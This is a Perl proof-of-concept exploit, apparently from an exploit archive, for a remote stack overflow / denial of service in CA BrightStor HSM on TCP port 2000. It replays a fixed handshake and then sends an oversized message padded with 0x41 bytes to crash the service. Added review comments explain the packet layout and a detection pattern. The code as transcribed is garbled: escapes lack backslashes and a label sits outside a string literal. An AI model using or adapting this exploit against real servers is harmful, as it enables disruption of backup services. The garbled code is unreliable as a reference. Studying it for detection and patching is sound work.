# Title : CA BrightStor HSM <= r11.5 Remote Stack Based Overflow / DoS
# Published : 2007-10-27
# Author : Nice Name Crew
#!/usr/bin/perl
#
# *
# * C@@@@@ O@@@@@@@ C@@@@@ O@@@@@@O C@@@@@@@@@o
# * C@@@@@@@@@@@@@@@@O C@@@@@@@@@@@@@@@@O C@@@@@@@@@@@@@o
# * C@@@@@@o .8@@@@@@. C@@@@@@o 8@@@@@@. @@@@@@O .@@o
# * C@@@@@ @@@@@@c C@@@@@ @@@@@@c C@@@@@c
# * C@@@@@ O@@@@@: C@@@@@ O@@@@@: @@@@@@
# * C@@@@@ O@@@@@: C@@@@@ O@@@@@: 8@@@@@
# * C@@@@@ O@@@@@: C@@@@@ O@@@@@: :@@@@@@ ::
# * C@@@@@ O@@@@@: C@@@@@ O@@@@@: c@@@@@@@Coo8@@@o
# * C@@@@@ O@@@@@: C@@@@@ O@@@@@: C@@@@@@@@@@@@o
# *
# * [0x00001010]
# *
# * Title: CA BrightStor HSM <= r11.5 Remote Stack Based Overflow / DoS
# * For: Windows XP (SP2 Professional) / Windows Server 2003 (Enterprise Edition)
# * Released by: NiceNameCrew [http://nnc.unkn0wn.eu]
# * Author: boecke <boecke@herzeleid.net>
# * Discovery: iDefense
# * Vulnerability Type: Remote Stack Overflow / DoS
# * Risk: High
# * TCP: 2000
# *
# * This body, this body holding me, be my reminder here that I am not alone.
# *
#
use IO::Socket;
# Proof-of-concept client for the CA BrightStor HSM service. It opens one TCP
# connection to a hard-coded peer (127.0.0.1:2000, see the IO::Socket::INET
# call below), replays a fixed sequence of five short protocol messages and
# then sends a single oversized message ($damage). The script takes no
# arguments, declares no lexicals (no `use strict`) and checks no return
# values.
#
# NOTE(review): as transcribed on this page the byte escapes have lost their
# leading backslash (`x14` where `\x14` was meant), the `print` calls end in a
# literal `n`, and the `(MSHOME)` annotation on the $computers line sits
# outside the string literal. The hex commentary below describes the author's
# intended bytes, not what these literals actually contain as printed.
#
# Message layout, as far as these literals show it: the first dword equals the
# message length in bytes for every message except $damage (0x14 = 20 for the
# handshake and each auth message, 0x1A = 26 for $computers). The author's
# labels on the first message present the second dword as a command code and
# the third dword (always 0x07 here) as flags.
$handshake =
"x14x00x00x00" . # [0x14000000] INIT_BEGIN (also the byte length: 20)
"x42x00x00x00" . # [0x42000000] FX_SET_CONSOLE_CREDENTIALS
"x07x00x00x00" . # [0x07000000] GUI_FLAGS
"x00x00x00x00x00x00x00x00"; # [0x00000000] END
# Packet capture excerpt the author derived the second message from; only the
# command dword differs from $handshake (0x44 instead of 0x42).
# 0030 ff d1 7b ef 00 00 14 00 00 00 44 00 00 00 07 00 ..{..... ..D.....
# 0040 00 00 00 00 00 00 00 00 00 00 ........ ..
$handshake_auth =
"x14x00x00x00x44x00x00x00x07x00x00x00" .
"x00x00x00x00x00x00x00x00";
# Command 0x03; trailing dword 0x08.
$handshake_auth2 =
"x14x00x00x00x03x00x00x00" .
"x07x00x00x00x00x00x00x00" .
"x08x00x00x00";
# Command 0x32; trailing dword 0x1C.
$handshake_auth3 =
"x14x00x00x00x32x00x00x00" .
"x07x00x00x00x00x00x00x00" .
"x1Cx00x00x00";
# Command 0x1C; all-zero tail.
$handshake_auth4 =
"x14x00x00x00x1Cx00x00x00" .
"x07x00x00x00x00x00x00x00x00x00x00x00";
# List Network Locations (command 0x0F). Defined but never sent below.
$drives =
"x14x00x00x00x0Fx00x00x00x07x00x00x00x00x00x00x00x00x00x00x00";
# List Computers on Network (MSHOME) (command 0x27, 26 bytes, ends in the
# ASCII workgroup name). Defined but never sent below.
$computers =
"x1Ax00x00x00" .
"x27x00x00x00" .
"x07x00x00x00" .
"x00x00x00x00x00x00x00x00" .
"x4Dx53x48x4Fx4Dx45" (MSHOME)
# The oversized message. The length dword claims 0x0540 (1344) but the literal
# is 1349 bytes (8 + 8 + 4 + 1232 + 40 + 20 + 4 + 16 + 8 + 3 + 6). The body is
# 1232 bytes of 0x41 followed by distinct four-byte marker groups, ".A;" and
# six nulls: there is no executable payload, so the effect is a crash (DoS).
# For detection/IR this is the only message in the script that is not 20-26
# bytes long: a TCP/2000 message with command dword 0x1D whose body is a long
# run of a single byte is the distinguishing feature.
$damage =
"x40x05x00x00x1Dx00x00x00" .
"x07x00x00x00x00x00x00x00" .
"x00x00x00x00" .
"x41" x 1232 .
"BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKK" .
"LLLLMMMMNNNNOOOOLOLO" .
"x41x42x43x44" .
"RRRRSSSSTTTTUUUU" .
"VVVVWWWW" .
"x2Ex41x3B" .
"x00x00x00x00x00x00";
# Peer is hard-coded to the local host; there is no argument handling. On a
# failed connect the whole block is skipped silently (no error message).
if ( $socket = IO::Socket::INET->new( PeerAddr => "127.0.0.1", PeerPort => "2000", Proto => "TCP" ))
{
# Each exchange is one send followed by a single recv of at most 256 bytes,
# printed raw. No return value is checked: if the service closes the
# connection after an earlier message, the remaining sends go to a dead
# socket and the printed reply is whatever $reply last held (presumably
# empty on the first iteration; `print` of undef warns under `warnings`).
print $socket $handshake;
recv($socket, $reply, 256, 0);
print($reply . "n");
print $socket $handshake_auth;
recv($socket, $reply, 256, 0);
print($reply . "n");
print $socket $handshake_auth2;
recv($socket, $reply, 256, 0);
print($reply . "n");
print $socket $handshake_auth3;
recv($socket, $reply, 256, 0);
print($reply . "n");
print $socket $handshake_auth4;
recv($socket, $reply, 256, 0);
print($reply . "n");
# The oversized message goes last, after the fixed handshake/auth sequence.
print $socket $damage;
recv($socket, $reply, 256, 0);
print($reply . "n");
}